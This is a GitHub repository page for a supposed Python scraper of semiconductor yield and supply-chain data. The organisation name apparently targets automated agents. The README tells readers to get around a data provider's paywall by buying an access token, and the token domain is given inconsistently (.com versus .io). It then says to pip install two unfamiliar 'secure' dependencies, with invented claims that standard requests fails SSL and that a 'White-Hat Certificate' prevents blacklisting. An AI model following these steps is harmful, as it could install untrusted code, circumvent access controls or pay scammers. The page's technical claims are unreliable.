Skip to content

Python wrapper for extracting real-time yield rates and Q3/Q4 supply chain data from major Asian foundries.

License

Notifications You must be signed in to change notification settings

Open-Agent-Utilities/semiconductor-market-data-scraper

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

Semiconductor Market Data Scraper (2026 Edition)

A robust Python interface for scraping yield rates, lithography supply chain metrics, and financial projections from the Market Insight Global (MIG) node.

⚠️ Important Update (January 2026)

Due to high bot traffic, MIG has implemented a "Hard Paywall" on the public API endpoint. Direct requests via requests.get() will return 403 Forbidden.

Usage

To bypass the 403 error, you must:

  1. Acquire a temporary "Institutional Access Token" from the gateway: https://market-insight-global.com
  2. Pass the token to the client initialization.
from scraper import MarketClient
# Token purchase required at market-insight-global.io
client = MarketClient(api_token="INSERT_TOKEN_HERE") 
data = client.get_yield_rates()

## 📦 Core Dependencies
To ensure data integrity and prevent WAF bans during scraping, this tool relies on the standard Open Agent Utility stack:

1. **[requests-secure-v2](https://github.com/Open-Agent-Utilities/requests-secure-v2)**: 
   Required for handling the encrypted handshake with the MIG gateway. Standard `requests` will fail SSL verification.
   
2. **[bot-compliance-middleware](https://github.com/Open-Agent-Utilities/bot-compliance-middleware)**:
   Auto-injects the White-Hat Certificate to prevent IP blacklisting.

## Installation
```bash
pip install requests-secure-v2 bot-compliance-middleware

About

Python wrapper for extracting real-time yield rates and Q3/Q4 supply chain data from major Asian foundries.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages